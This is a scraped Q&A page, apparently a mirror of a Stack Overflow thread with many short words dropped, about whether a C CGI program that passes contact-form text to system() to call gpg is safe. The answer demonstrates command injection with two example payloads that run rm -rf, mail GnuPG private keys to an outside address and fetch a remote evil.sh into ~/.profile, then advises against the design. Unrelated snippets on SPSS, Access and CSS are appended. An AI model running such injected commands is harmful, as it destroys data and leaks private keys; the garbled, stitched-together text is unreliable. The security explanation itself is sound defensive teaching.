forms - Is running a C/C++ CGI script on Apache dangerous? -


i programming own little website system (a script compiles markdown documents, , puts them in appropriate locations, making quick, static website). enable people go (initially static) contact page, send me gnupg-encrypted message.

basically, visitor writes or message in contact form, clicks checkbox if want message encrypted, , upon receiving form, c(?) program of mine calls system("gpg --encrypt --recipient 31a49121cd42ff00 --armor <the_message>");

(i have yet determine how message contents , use in command without writing unencrypted message disk).

is (un)secure use exec() in self-made c program processes form data? there simpler way achieve want (using standalone script—because website static—to run gpg)? security considerations haven’t thought about?

i asking on here instead of security se because looking answers developers’ points of view.

as security professional makes @ least modest living consulting on subject, , rather prolific c programmer can give few different thoughts on subject.

when considering security of processes executing on target, have consider number of things , how may abuse situation.

a glimpse

let's @ immediate security problem see off hand, using "system()" call directly on <the_message> ; can imagine following:

the_message="hello , goodbye; rm -rf *; cat $home/.gpg/* | /usr/bin/sendmail -s 'these private keys' temporary_account@hotmail.com" or worse;  the_message="hello , goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"

so first thing never use provided user command or part of command-line; save message temporary text file , encrypt that;

a deeper look

okay what's going on in terms of using c; before give answer, love c; exclusively program in c , have been professional developer main focus on c last 24 years. now, c horrid tool writing cgi program in, , should if have compelling reason. , after find reason, should discard anyways , abandon thought.

here reasons why shouldn't use c cgi interface.

cgi/1.1 ugly standard; uses environment variables, stdin, , sorts of character remapping , recoding data across. invariably going have deal either implementing cgi interface or using libcgi or equivalent library in order deal permutations, , @ end you'll hate it.

when used http://libcgi.sourceforge.net particular project had debug , harden , augment because had horrible buffer on flow issues left right , center, non-existant utf-8 support , limited control on authentication.

but if have covered, c bad idea because lot of security issues arise out of manual manipulation of memory 1 has do.

a higher level language (shell script, awk, perl, php etc.) better tool handle cgi; perl built it, , php specially built it. advantage of using perl or php in situation gnupg modules available don't have system() anything;

the key development use easiest, straightforward toolkit job; in case think should not use c, force things done in form of proper cgi processing language such php.

those thoughts; hope


Comments

Post a Comment

Popular posts from this blog

SPSS keyboard combination alters encoding -

my question not have programming practical issue on spss. accident keyword combination cannot remember because did not intend press changed encoding in spss , text in data in different language english shown small boxes. nevertheless, when kind of analysis performed different language text shown in output. does know reason? tried change encoding did not produce result. first, @ edit > options , see whether setting unicode or locale. might fix it. if have text in multiple languages, want unicode. otherwise, may have specific locale set wrong. can change set locale, need know locale want use.
Read more

Add new record to the table by click on the button in Microsoft Access -

in ms access form want implement separate button, adds new record table. in order added button , attached button event: private sub btnaddrec_click() refresh codecontextobject on error resume next docmd.gotorecord , , acnewrec if err.number <> 0 btnaddrec.enabled = false end if end end sub everything ok when open window , click btnaddrec button, problem when first of perform navigation through existed records , after click on button. got runtime error: 2105: «you can't go specified record. may @ end of recordset» . how solve issue, need have ability add new record on click on specific button, no matter, have walked or not walked through records before. thanks. i created simple form field call description (and autonumber) , created button code follows click event. filled number of records , navigated through them, clicked addnewrec button. form navigated new record without issues. able click addnewrec button directly after
Read more

CSS3 Transition to highlight new elements created in JQuery -

i want use css3 color transition apply highlight-fading color effect (yellow transparent) new elements appended markup using jquery. css #content div { background-color:transparent; -moz-transition:background-color 2s; -webkit-transition:background-color 2s; -o-transition:background-color 2s; transition:background-color 2s; } #content div.new { background-color:yellow; } html <div id="content"></div> <a id="add-element" href="#">add new element</a> js $('#add-element').click(function() { var newelement = $('<div class="new">new element</div>'); $('#content').append(newelement); newelement.removeclass('new'); }); when click link, new element created. class "new" (background color yellow) , it's appended html markup. should able remove "new" class trigger background color transition transparent (or whate
Read more